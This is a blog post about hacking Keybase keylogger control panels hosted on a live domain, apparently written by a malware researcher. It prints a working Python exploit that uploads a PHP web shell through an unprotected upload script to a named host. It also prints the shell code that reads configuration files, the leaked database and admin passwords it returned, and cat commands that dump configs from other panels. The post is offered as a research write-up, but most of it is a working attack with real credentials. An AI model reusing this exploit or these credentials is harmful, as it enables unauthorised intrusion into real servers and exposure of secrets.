1 panel, 2 panels, 3 panels...

on under jekyll
2 minute read

1 panel, 2 panels, 3 panels...

I was hanging out on Cybercrime-Tracker and noticed some Keybase panels. I never heard of that one before so I decided to take a look. Turns out Keybase is not a botner but rather a keylogger, it can also take screenshot of the victim's desktop.

One of the domain was still up and there was 3 Keybase panels listed on Cybercrime Tracker:

The first fail is that permission are not checked on the /image/Imaged directory, therefore anyone aware of this can access the screenshots:

The first two panels didn't have the /images/upload.php file but luckily for me the ugo did. Unit 32 already found some nice vulnerabilities in the Keybase source code so I tried it.

I ran this python script with the next file as argument.

import requests
import sys

if len(sys.argv) != 2:
    print "Usage: %s [php_file]" % __file__

URL = "http://www.omarabdulaziz.com/ugo/"
print "Sending request..."

multiple_files = [('file', ('owned.php', open(sys.argv[1], 'rb')))]

r = requests.post(URL + "image/upload.php", files=multiple_files)
print r
print "Results:"

r = requests.get(URL + "image/Images/owned.php")

print r.text
    $file = '../../config.php';

    echo "It works!"."</br>";

    if (file_exists($file)) {
        echo "Reading file"."</br>";
        echo file_get_contents($file);

Here's the result:

Sending request...
<Response [200]>

It works!</br>Reading file</br><?php
//Edit your database details

$mysql_host = "localhost";
$mysql_database = "omarabdu_ugo";
$mysql_user = "omarabdu_ugo";
$mysql_password = "joinkrama2";

//These are for accessing your web-panel. You can change these any time.

$panelusername = "admin";
$panelpassword = "ugo12345";


So of course... I got in

That's pretty cool, but are all the panels of this domain actually listed on cybercrime-tracker? I took a look at the public_html folder and found additional panels:

So you got it... Since we got cmd exec we can get the passwords for all the panels at once:

cat /home/omarabdu/public_html/ugo/config.php &
cat /home/omarabdu/public_html/daniel/config.php &
cat /home/omarabdu/public_html/golden/config.php &
cat /home/omarabdu/public_html/chuks/config.php &
cat /home/omarabdu/public_html/panel2/config.php &
cat /home/omarabdu/public_html/owerri/config.php
cat /home/omarabdu/public_html/nonso/config.php

keybase, c&c, botnet, malware
comments powered by Disqus